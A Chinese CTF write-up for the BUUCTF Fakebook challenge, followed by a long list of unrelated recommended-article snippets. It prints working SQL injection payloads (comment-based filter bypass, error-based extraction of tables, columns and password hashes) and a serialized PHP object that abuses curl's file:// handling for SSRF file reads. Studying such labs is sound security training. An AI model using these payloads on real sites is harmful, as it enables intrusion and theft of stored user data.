王小帥
王小帥

BUUCTF[网鼎杯2018]Fakebook

BUUCTF[网鼎杯2018]Fakebook_第1张图片

我们注册一个账号看看:

BUUCTF[网鼎杯2018]Fakebook_第2张图片

注册成功如下: 

BUUCTF[网鼎杯2018]Fakebook_第3张图片

这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1 可能存在sql注入,我们试试

?no=1 and 1=1

BUUCTF[网鼎杯2018]Fakebook_第4张图片

 

?no=1 and 1=2

BUUCTF[网鼎杯2018]Fakebook_第5张图片

回显不同,存在SQL注入,

试试数据库名称,

?no=1 union select database();

BUUCTF[网鼎杯2018]Fakebook_第6张图片

尝试一些绕过, 

?no=1 ununionion seselectlect database();   no
?no=1 uNion sElEct database();              no
?no=1/**/union/**/select/**/database();     yes 但是字段数不对,
?no=0/**/union/**/select/**/1,2,3,4%23      yes 测试出来字段数为4,回显点位为2
?no=0/**/union/**/select/**/1,database(),3,4; 爆数据库名。

BUUCTF[网鼎杯2018]Fakebook_第7张图片

可以发现是整型注入,而且可以使用union注入配合注释符进行绕过,下面使用union+报错注入来注入,为的是复习SQL注入。

爆库payload: 

?no=0/**/union/**/select/**/1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'fakebook'%23
?no=1 and extractvalue(1,concat('~',(select database())))#

 

BUUCTF[网鼎杯2018]Fakebook_第8张图片

数据库名称:fakebook,路径:/var/www/html/db.php

爆表名payload:

?no=1 and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'fakebook')))#

BUUCTF[网鼎杯2018]Fakebook_第9张图片

BUUCTF[网鼎杯2018]Fakebook_第10张图片

 表名:users

爆字段名:

?no=1 and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'fakebook' and table_name = 'users')))#

BUUCTF[网鼎杯2018]Fakebook_第11张图片

字段名:no,username,passwd,data 

爆字段:

?no=1 and extractvalue(1,concat('~',(select group_concat(username,'~',passwd) from users)))#

emmmmm,wtf,这不是刚刚注册的信息吗,我们查查另外两个字段试试,

?no=1 and extractvalue(1,concat('~',(select group_concat(no,'~',data) from users)))#

BUUCTF[网鼎杯2018]Fakebook_第12张图片

以上,根据报错信息可以知道网站绝对路径(/var/www/html/)和数据库里的数据都是序列化存储,反序列化读取。

我们分别盲猜访问flag.php和robots.txt,或者使用目录扫描工具扫描。

说明存在flag.php。

我们访问robots.txt

下载泄露的源码备份文件,源码如下:

name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

可以看到,用户在注册填的bolg会调用get()函数使用curl发起网络请求获得blog内容并显示出来,这里因为curl_exec()使用不当造成SSRF(服务器端请求伪造)。注册的时候是不能直接利用SSRF漏洞读flag.php的,因为注册的时候限制了http(s)协议。 

可以看到,curl是允许file协议的,所以这里我们想到利用这个读取/var/www/html/flag.php

我们需要构造反序列化内容,

编译运行,构造好的序列化之后的流如下: 

O:8:"UserInfo":3:{s:4:"name";s:3:"wxs";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

然后在sql注入点构造payload如下:

?no=0/**/union/**/select/**/1,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:3:"wxs";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27#

 BUUCTF[网鼎杯2018]Fakebook_第13张图片

base64解码data得flag。

漏洞利用:SQL注入+SSRF+PHP反序列化漏洞 

思路:首先注册用户,然后登录,在注册的时候发现,blog一栏是跳转,(后面看到源码发现存在SSRF漏洞),然后登录成功,点击姓名,发现url存在sql注入,再得到数据信息之后,发现网站绝对路径(/var/www/html/)以及数据库里的数据存储方式为序列化存储,反序列化读取的。这里想到自己构造序列化之后的攻击流,使其反序列化,利用SSRF file协议跳转到flag.php,得到flag。

你可能感兴趣的:(CTF日记,数据库,安全漏洞)

  • 2019-03-30 随缘常喜艾佳
    觉知日记三十:今天在广州参观展会,选择新的供应商,感受到行业的快速发展。一些厂家对市场的反应速度快的惊人,在我们刚刚有潜在需求时,厂家已经拿出了相应的产品,定位准确的展现在面前。在行业定位后,客户定位,产品定位,营销定位⋯有一句话说定位定天下,今天有了更深的领悟和学习,期待明天的收获。能量310。2019.3.30
  • 转码日记——Javascript笔记(8) zzcoding_ 转码日记数据结构javascript前端开发语言
    数组(Array)数组也是一个对象,和普通对象功能类似。普通对象使用字符串作为属性名,而数组使用数字来作为索引操作。索引:从0开始的整数。数组的存储效率比较高,对属性名没有要求的时候可以使用。基本应用//创建数组对象vararr=newArray();//向数组中添加对象//语法:数组[索引]=值;arr[0]=10;arr[1]=33;//如果读取不存在的索引则返回undefined//获取数组
  • Java Web安全与Spring Config对象实战 福建低调
    本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全
  • heidisql linux 安装_CentOS mysql GUI图形化数据库管理工具Heidisql的安装Navicat 俄罗斯一只战斗鸡 heidisqllinux安装
    在Windows下有用过Navicat和Heidisql,都是很强大的工具。因为Navicat是收费的,转到Linux环境下就一下使用Heidisql了。安装:系统环境:Centos7.2一、首先修改yum的源为阿里云:1、备份mv/etc/yum.repos.d/CentOS-Base.repo/etc/yum.repos.d/CentOS-Base.repo.backup2、下载新的CentO
  • python提取数据库数据到前端html5显示_python html提取数据库数据 weixin_39878745
    python开源工具列表【持续更新】以下是个人在工作中整理的一些pythonwheel,供参考。这个列表包含与网页抓取和数据处理的Python库网络通用urllib-网络库(stdlib)。requests-网络库。grab–网络库(基于pycurl)。pycurl–网络库(绑定libcurl)。urllib3–...文章武耀文2018-04-253128浏览量8个用于业余项目的优秀Python库
  • unity连接mysql并读取所有数据库_Unity 3D 连接Mysql数据库 地理沙龙
    usingUnityEngine;usingSystem;usingSystem.Data;usingSystem.Collections;usingMySql.Data.MySqlClient;usingMySql.Data;usingSystem.IO;publicclassSqlAccess{publicstaticMySqlConnectiondbConnection;//如果只是在本地的
  • heidisql linux 安装_Linux和Windows下Mysql数据库安装详解 吴钧泽 heidisqllinux安装
    目录数据库原理数据库简介文件存储对数据的存储需求一直存在。保存数据的方式,经历了手工管理、文件管理等阶段,直至数据库管理阶段。文件存储方式保存数据的弊端:缺乏对数据的整体管理,数据不便修改;不利于数据分析和共享;数据量急剧增长,大量数据不可能长期保存在文件中。数据库应运而生,是人们存放数据、访问数据、操作数据的存储仓库。DB和DBMS数据库(Database,简称DB)是按照数据结构来组织、存储和
  • 淘宝海量数据库OceanBase:系统架构详解 weixin_34356555 数据库系统架构大数据
    无论从数据量还是访问量,OceanBase不再能够是一个单机系统,即使一台单机能服务高达几个TB的数据、提供几万QPS的服务能力,因此,分布式系统不可避免,然而,内部如何实现拆表(拆库)以及如何实现数据库的事务,成为了一个很大的挑战和十分艰难的抉择:相关文章:淘宝海量数据库之一:来自业务的挑战淘宝海量数据库之二:一致性选择淘宝海量数据库之三:事务的ACID一种选择是当前数据库的常用的水平拆库,淘宝
  • unity 局域网读取文件_(转载)Unity3D连接本地或局域网MySQL数据库 丛子涵 unity局域网读取文件
    1usingMySql.Data.MySqlClient;2usingSystem;3usingSystem.Data;45publicclassMySqlAccess6{7publicstaticMySqlConnectionmySqlConnection;//连接类对象89privatestaticstringhost;//IP地址。如果只是在本地的话,写localhost就可以。10priv
  • heidisql linux 安装_linux安装mysql教程 是佐罗而非索隆 heidisqllinux安装
    1系统约定安装文件下载目录:/data/softwareMysql目录安装位置:/usr/local/mysql数据库保存位置:/data/mysql日志保存位置:/data/log/mysql执行如下命名:#mkdir/data/software#cd/data/software--下载安装包--建议:在windows上使用迅雷下载,速度很快(我的是1M/s),然后用工具(Xftp)上传到/da
  • 成长之路 翟婧婷爸爸
    2018年8月15日星期三~多云转小雨亲子日记第29天图片发自App还剩半个月女儿就要开学了,上午收到辅导班老师的信息,下午继续假期第二阶段的课程,时间由原来的2个小时调整为3个小时,放学时间与我下班时间有冲突,女儿又要自己回家了。下午天气突变,刮起了大风,在班上默默祈祷别下雨,可惜天不随人愿,下班时淅淅沥沥的下起了小雨,还伴有大风,担心女儿回家的安全问题,便打电话问她怎么回家,女儿说风太大,骑单
  • 感恩日记第301天 爱眉小札夏大宝
    图片发自App感谢我的父母赐予我健全的生体与独立的灵魂.感谢我的父母让我拥有一颗向善的心。感谢我的父母用他们所知道的最好方式来爱我。感谢爸爸妈妈感谢自己朝着自己的目标跨出第一步!继续努力感谢凡姐那么支持我!愿意帮我出货感谢阿奇帮我对版本,谢谢他~那么实在!感谢曹先生帮我寄快递,还给我打折。感谢宇宙天使让我拥有无条件爱我的家人。感谢宇宙天使让我成为经济自由的销售工作者。把美好的事物分享给他人。感谢宇
  • 陪读家长日记 万水千山1688
    今天距离高考还有161天。每个父母,谈到孩子都会有兴奋点,天下父母的共性吧,这不早上老婆收到书店寄出的书,书店老板情商高,为使快递重视不延误,特意在快递单上留言:“快递小哥,您好!这位顾客是未来高考之状元,人中之龙凤,他急需此件,请您优先派送谢谢!”虽知恭维之举,但做妈妈的还是很兴奋,忙不迭的贴图分享给我和家人!尤可见每一个父母都希望是望子成龙,望女成凤!昨天晚上洗手间的灯泡坏了,儿子郁闷:怎么要
  • 人生就是一个享受体验当下的过程,做好自己,做好孩子的榜样 安心喜悦
    洪予妈妈幸福感恩日记第203天时间:2019年11月30日(农历十一月初五)周六天气阴转多云学经方法:137累积法(第65周第6天)学经内容:《易经》;《孝经》;《中国古典长诗精选神童诗》。参加人员:妈妈(32岁)洪予(6岁)读经过程:今天我和洪予读的经典,因为7点有一个课程,在读的过程中,有一些着急,让我体察到自己的起心动念,需要让自己静下来,定下来,静能生慧。好好修炼自己的这颗心,让自己心平气
  • 从理论到实践:MySQL 性能优化和高可用架构,一次讲清 程序猿java易 mysql性能优化架构
    数据库系统作为IT业务系统的核心,其高可用性和容灾能力对整个业务系统的连续性和数据完整性起着至关重要的作用,是企业正常运营的基石尤其是在性能优化与高可用架构两方面,很多从业多年的DBA限于生产环境的固定体系,往往盲人摸象,难窥全局。而性能优化和高可用又是一对存在根本矛盾的特性。可以说,掌握了这两项技术的平衡,就掌握了MySQL的绝大部分内容,也就把握了数据库核心技术的最主流脉络。这本《MySQL性
  • Python使用pymysql和xlrd2将Excel数据导入MySQL数据库 悬崖上的金鱼6 数据库pythonexcelmysqloracle
    在数据处理和管理中,有时候需要将Excel文件中的数据导入到MySQL数据库中进行进一步的分析和操作。本文将介绍如何使用Python编程语言实现这个过程。导入所需库importxlrd2#导入xlrd2库,用于读取Excel文件importpymysql#导入pymysql库,用于连接和操作MySQL数据库fromdatetimeimportdatetime#导入datetime库,用于处理日期和
  • 【Java】已解决:org.springframework.transaction.TransactionTimedOutException 屿小夏 java数据库开发语言
    文章目录一、分析问题背景场景描述二、可能出错的原因三、错误代码示例四、正确代码示例五、注意事项已解决:org.springframework.transaction.TransactionTimedOutException一、分析问题背景在Spring框架中,TransactionTimedOutException是一种常见的事务超时异常。通常,这种异常发生在数据库操作时间超过了预设的事务超时时间
  • 卢红光感恩日记第四十天 一缕阳光卢红光
    2020年1月10日中雨感恩童哥哥今天帮我清理店面,感恩隔壁阿姨的水,可以让我不用跑那么远去拿水清理。感恩隔壁邻居们都很热情。感恩晚上很顺利的签好了房租合同,我的小店终于可以开起来了。这个世界上最珍贵的,便是一颗懂得感恩的心。感恩大自然,让我可以自由呼吸;感恩父母,赋予我生命,并给予我深情浓厚的爱;感恩老师,传授给我知识,并教会我做人的道理;感恩相依相伴的爱人,陪我走过风风雨雨;感恩孩子,让我分享
  • SQLite数据库管理与Android应用集成 含老司开挖掘机
    本文还有配套的精品资源,点击获取简介:SQLite是一种轻量级的关系型数据库,适用于移动设备和单机应用。它内置了对SQL标准的支持,并提供丰富的数据操作功能。在Android开发中,SQLite是默认的数据库解决方案,可通过SQLiteOpenHelper和SQLiteDatabaseAPI进行管理。本教程将通过实践帮助理解SQLite数据库的创建、管理和使用,以及如何将其与Android应用集成
  • linux系统下PostgreSQL的使用 敲代码的雪糕 linuxlinuxpostgresql运维
    文章目录前言一、安装pgsql数据库二、安装c和c++驱动三、使用1、头文件2、源文件3、main文件4、编译前言最近工作中使用到了pgsql,主要是使用其c++驱动完成数据库创建及增删改查等操作…一、安装pgsql数据库使用命令如下:sudoapt-getinstallpostgresql安装完成,使用如下命令,确认数据库版本:psql--version二、安装c和c++驱动使用如下命令安装c驱
  • 【周检视】0210-2019第X周 babyQjy
    佳佳好习惯养成:日常:早起、锻炼、看书、记账、Time、日记美好:面膜、泡脚、看电影、交友易效能:打卡、晨间日记、100讲一,好习惯篇【早起】本周践行的好习惯,仍然是早睡早起,早起打卡。【健康】2.4-2.10keep三次【学习计划】听书二本看书一本【工作篇】02050206020702080209初六开工0210【休闲篇】除夕-春节2020204家庭聚餐0206紫金山0209外婆家
  • 《写件是最好的自我投资》︱如何写出爆款文 杨舒羽
    打开,看到自己写下的文章阅读量不高,忍不住开始怀疑自己的选择,是否喜欢阅读热爱写日记的自己,并不适合于新媒体写作。有点不甘心的我,琢磨着要写出一篇爆款文,来给自己信心坚持。不知道你,会不会也一样呢?突然想起朋友给我推荐过《写作是最好的自我投资》,作者Spenser,香港第一自媒体人,写过多篇百万阅读爆款文。我灵光一闪,快速从图书馆书架上找到它,翻看起来,一个个答案慢慢展开在我的眼前。一、注意力写作
  • Docker部署Doris数据库 hai40587 docker数据库容器
    Docker部署Doris数据库是一个涉及多个步骤的过程,包括环境准备、Docker镜像拉取、配置文件创建、容器启动与配置、以及后续的数据库操作等。以下是一个详细的Docker部署Doris数据库的教程,旨在帮助用户成功在Docker环境中部署并运行Doris数据库。一、环境准备在部署Doris之前,需要确保你的系统已经安装了Docker。Docker是一个开源的容器化平台,可以帮助你轻松地部署和
  • 成长日记2019年11月4日 易如人生
    早晨从单位出来在外面吃了早点后就回家了,本计划和烁妈一起去韩家墅市场一起采购食材的,但是因为大姐病情反复烁妈一直陪着她,我只能带着儿子去,买了大河蟹和三文鱼北极贝,就去村里接妹妹妹夫,晚上下厨给一家子弄了一桌饭菜庆祝老娘的六十六岁生日,希望老婆儿以后更加注意身体,健康平安幸福图片发自App图片发自App图片发自App图片发自App
  • 两阶段事务提交 码农小伙 事务java
    简介分布式事务是指会涉及到操作多个数据库的事务,在分布式系统中,各个节点之间在物理上相互独立,通过网络进行沟通和协调。XA就是X/OpenDTP定义的交易中间件与数据库之间的接口规范(即接口函数),交易中间件用它来通知数据库事务的开始、结束以及提交、回滚等。XA接口函数由数据库厂商提供。二阶段提交(Two-phaseCommit)是指,在计算机网络以及数据库领域内,为了使基于分布式系统架构下的所有
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • Web安全之CSRF攻击详解与防护 J老熊 JavaWeb安全web安全csrf安全java面试运维
    在互联网应用中,安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造(Cross-SiteRequestForgery,CSRF),是一种常见的Web安全漏洞。通过CSRF攻击,黑客可以冒用受害者的身份,发送恶意请求,执行诸如转账、订单提交等操作,导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法,结合电商交易系统的场景给出错误和正确的示范代码,并分析常见的安全问题与解决方案,
  • 考研日记(171) 斑驳_时光
    毛纲源刷题上午和晚上,明天结束第一章英语阅读一篇,单词好好重新背专业课加油下午出去实地考察了,算是见识吧,还是太小了,我要走出去,加油^0^~人生就是为了自己而活,不为了谁,你就可以更好的走下去!
  • 今天偷懒一天_2021年4月20日跑步日记 跑渣汤姆
    昨天跑的很爽很舒服,节奏也不错,想着今天再继续昨天的六分多的配速继续呢,没想到早上下雨了。雨吓得不小,跑一公里就能淋湿裤子的那种。尝试跑了一公里,鞋子都湿了。还是算了吧,只是可惜了这么好的天气和温度。只是地面太湿滑了。
  • 20个MySQL 日期和时间函数,附带用法说明 蜗牛小白 MySQLmysql数据库
    在数据库管理和数据处理过程中,日期和时间的处理是一个重要的方面。MySQL提供了一组强大的日期和时间函数,允许用户对日期和时间数据进行各种操作和计算。这些函数可以帮助用户进行日期的格式化、日期之间的差异计算、从日期中提取特定部分等操作。以下列举了一些常用的MySQL日期和时间函数及其详细示例,以帮助开发者更高效地处理和管理日期和时间数据。常用的MySQL日期和时间函数1.NOW()返回当前日期和时
  • java线程Thread和Runnable区别和联系 zx_code javajvmthread多线程Runnable
    我们都晓得java实现线程2种方式,一个是继承Thread,另一个是实现Runnable。 模拟窗口买票,第一例子继承thread,代码如下 package thread; public class ThreadTest { public static void main(String[] args) { Thread1 t1 = new Thread1(
  • 【转】JSON与XML的区别比较 丁_新 jsonxml
    1.定义介绍 (1).XML定义 扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML使用DTD(document type definition)文档类型定义来组织数据;格式统一,跨平台和语言,早已成为业界公认的标准。 XML是标
  • c++ 实现五种基础的排序算法 CrazyMizzz C++c算法
    #include<iostream> using namespace std; //辅助函数,交换两数之值 template<class T> void mySwap(T &x, T &y){ T temp = x; x = y; y = temp; } const int size = 10; //一、用直接插入排
  • 我的软件 麦田的设计者 我的软件音乐类娱乐放松
         这是我写的一款app软件,耗时三个月,是一个根据央视节目开门大吉改变的,提供音调,猜歌曲名。1、手机拥有者在android手机市场下载本APP,同意权限,安装到手机上。2、游客初次进入时会有引导页面提醒用户注册。(同时软件自动播放背景音乐)。3、用户登录到主页后,会有五个模块。a、点击不胫而走,用户得到开门大吉首页部分新闻,点击进入有新闻详情。b、
  • linux awk命令详解 被触发 linux awk
    awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息 awk处理过程: 依次对每一行进行处理,然后输出 awk命令形式: awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END{}’ file [-F|-f|-v]大参数,-F指定分隔符,-f调用脚本,-v定义变量 var=val
  • 各种语言比较 _wy_ 编程语言
                        Java Ruby PHP 擅长领域                  
  • oracle 中数据类型为clob的编辑 知了ing oracle clob
    public void updateKpiStatus(String kpiStatus,String taskId){ Connection dbc=null; Statement stmt=null; PreparedStatement ps=null; try { dbc = new DBConn().getNewConnection(); //stmt = db
  • 分布式服务框架 Zookeeper -- 管理分布式环境中的数据 矮蛋蛋 zookeeper
    原文地址: http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/ 安装和配置详解 本文介绍的 Zookeeper 是以 3.2.2 这个稳定版本为基础,最新的版本可以通过官网 http://hadoop.apache.org/zookeeper/来获取,Zookeeper 的安装非常简单,下面将从单机模式和集群模式两
  • tomcat数据源 alafqq tomcat
    数据库 JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。 没有使用JNDI时我用要这样连接数据库: 03.  Class.forName("com.mysql.jdbc.Driver");  04.  conn
  • 遍历的方法 百合不是茶 遍历
                                                          遍历 在java的泛
  • linux查看硬件信息的命令 bijian1013 linux
    linux查看硬件信息的命令 一.查看CPU: cat /proc/cpuinfo   二.查看内存: free   三.查看硬盘: df   linux下查看硬件信息 1、lspci 列出所有PCI 设备; lspci - list all PCI devices:列出机器中的PCI设备(声卡、显卡、Modem、网卡、USB、主板集成设备也能
  • java常见的ClassNotFoundException bijian1013 java
    1.java.lang.ClassNotFoundException: org.apache.commons.logging.LogFactory   添加包common-logging.jar2.java.lang.ClassNotFoundException: javax.transaction.Synchronization    
  • 【Gson五】日期对象的序列化和反序列化 bit1129 反序列化
    对日期类型的数据进行序列化和反序列化时,需要考虑如下问题:   1. 序列化时,Date对象序列化的字符串日期格式如何 2. 反序列化时,把日期字符串序列化为Date对象,也需要考虑日期格式问题 3. Date A -> str -> Date B,A和B对象是否equals   默认序列化和反序列化     import com
  • 【Spark八十六】Spark Streaming之DStream vs. InputDStream bit1129 Stream
      1. DStream的类说明文档:   /** * A Discretized Stream (DStream), the basic abstraction in Spark Streaming, is a continuous * sequence of RDDs (of the same type) representing a continuous st
  • 通过nginx获取header信息 ronin47 nginx header
    1. 提取整个的Cookies内容到一个变量,然后可以在需要时引用,比如记录到日志里面, if ( $http_cookie ~* "(.*)$") {         set $all_cookie $1; }     变量$all_cookie就获得了cookie的值,可以用于运算了
  • java-65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 bylijinnan java
    参考了网上的http://blog.csdn.net/peasking_dd/article/details/6342984 写了个java版的: public class Print_1_To_NDigit { /** * Q65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 * 1.使用字符串
  • Netty源码学习-ReplayingDecoder bylijinnan javanetty
    ReplayingDecoder是FrameDecoder的子类,不熟悉FrameDecoder的,可以先看看 http://bylijinnan.iteye.com/blog/1982618 API说,ReplayingDecoder简化了操作,比如: FrameDecoder在decode时,需要判断数据是否接收完全: public class IntegerH
  • js特殊字符过滤 cngolon js特殊字符js特殊字符过滤
    1.js中用正则表达式 过滤特殊字符, 校验所有输入域是否含有特殊符号function stripscript(s) {    var pattern = new RegExp("[`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()&mdash;—|{}【】‘;:”“'。,、?]"
  • hibernate使用sql查询 ctrain Hibernate
    import java.util.Iterator; import java.util.List; import java.util.Map; import org.hibernate.Hibernate; import org.hibernate.SQLQuery; import org.hibernate.Session; import org.hibernate.Transa
  • linux shell脚本中切换用户执行命令方法 daizj linuxshell命令切换用户
    经常在写shell脚本时,会碰到要以另外一个用户来执行相关命令,其方法简单记下:   1、执行单个命令:su - user -c "command" 如:下面命令是以test用户在/data目录下创建test123目录 [root@slave19 /data]# su - test -c "mkdir /data/test123" 
  • 好的代码里只要一个 return 语句 dcj3sjt126com return
    别再这样写了:public boolean foo() {    if (true) {         return true;     } else {          return false;    
  • Android动画效果学习 dcj3sjt126com android
    1、透明动画效果 方法一:代码实现 public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.fragment_main, container, fals
  • linux复习笔记之bash shell (4)管道命令 eksliang linux管道命令汇总linux管道命令linux常用管道命令
    转载请出自出处: http://eksliang.iteye.com/blog/2105461     bash命令执行的完毕以后,通常这个命令都会有返回结果,怎么对这个返回的结果做一些操作呢?那就得用管道命令‘|’。     上面那段话,简单说了下管道命令的作用,那什么事管道命令呢?     答:非常的经典的一句话,记住了,何为管
  • Android系统中自定义按键的短按、双击、长按事件 gqdy365 android
    在项目中碰到这样的问题: 由于系统中的按键在底层做了重新定义或者新增了按键,此时需要在APP层对按键事件(keyevent)做分解处理,模拟Android系统做法,把keyevent分解成: 1、单击事件:就是普通key的单击; 2、双击事件:500ms内同一按键单击两次; 3、长按事件:同一按键长按超过1000ms(系统中长按事件为500ms); 4、组合按键:两个以上按键同时按住;
  • asp.net获取站点根目录下子目录的名称 hvt .netC#asp.nethovertreeWeb Forms
    使用Visual Studio建立一个.aspx文件(Web Forms),例如hovertree.aspx,在页面上加入一个ListBox代码如下: <asp:ListBox runat="server" ID="lbKeleyiFolder" />   那么在页面上显示根目录子文件夹的代码如下: string[] m_sub
  • Eclipse程序员要掌握的常用快捷键 justjavac javaeclipse快捷键ide
      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。   曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  写道 程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可
  • c++编程随记 lx.asymmetric C++笔记
     为了字体更好看,改变了格式……   &&运算符:   #include<iostream> using namespace std; int main(){      int a=-1,b=4,k;      k=(++a<0)&&!(b--
  • linux标准IO缓冲机制研究 音频数据 linux
    一、什么是缓存I/O(Buffered I/O)缓存I/O又被称作标准I/O,大多数文件系统默认I/O操作都是缓存I/O。在Linux的缓存I/O机制中,操作系统会将I/O的数据缓存在文件系统的页缓存(page cache)中,也就是说,数据会先被拷贝到操作系统内核的缓冲区中,然后才会从操作系统内核的缓冲区拷贝到应用程序的地址空间。1.缓存I/O有以下优点:A.缓存I/O使用了操作系统内核缓冲区,
  • 随想 生活 暗黑小菠萝 生活
    其实账户之前就申请了,但是决定要自己更新一些东西看也是最近。从毕业到现在已经一年了。没有进步是假的,但是有多大的进步可能只有我自己知道。   毕业的时候班里12个女生,真正最后做到软件开发的只要两个包括我,PS:我不是说测试不好。当时因为考研完全放弃找工作,考研失败,我想这只是我的借口。那个时候才想到为什么大学的时候不能好好的学习技术,增强自己的实战能力,以至于后来找工作比较费劲。我
  • 我认为POJO是一个错误的概念 windshome javaPOJO编程J2EE设计
                  这篇内容其实没有经过太多的深思熟虑,只是个人一时的感觉。从个人风格上来讲,我倾向简单质朴的设计开发理念;从方法论上,我更加倾向自顶向下的设计;从做事情的目标上来看,我追求质量优先,更愿意使用较为保守和稳妥的理念和方法。    &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他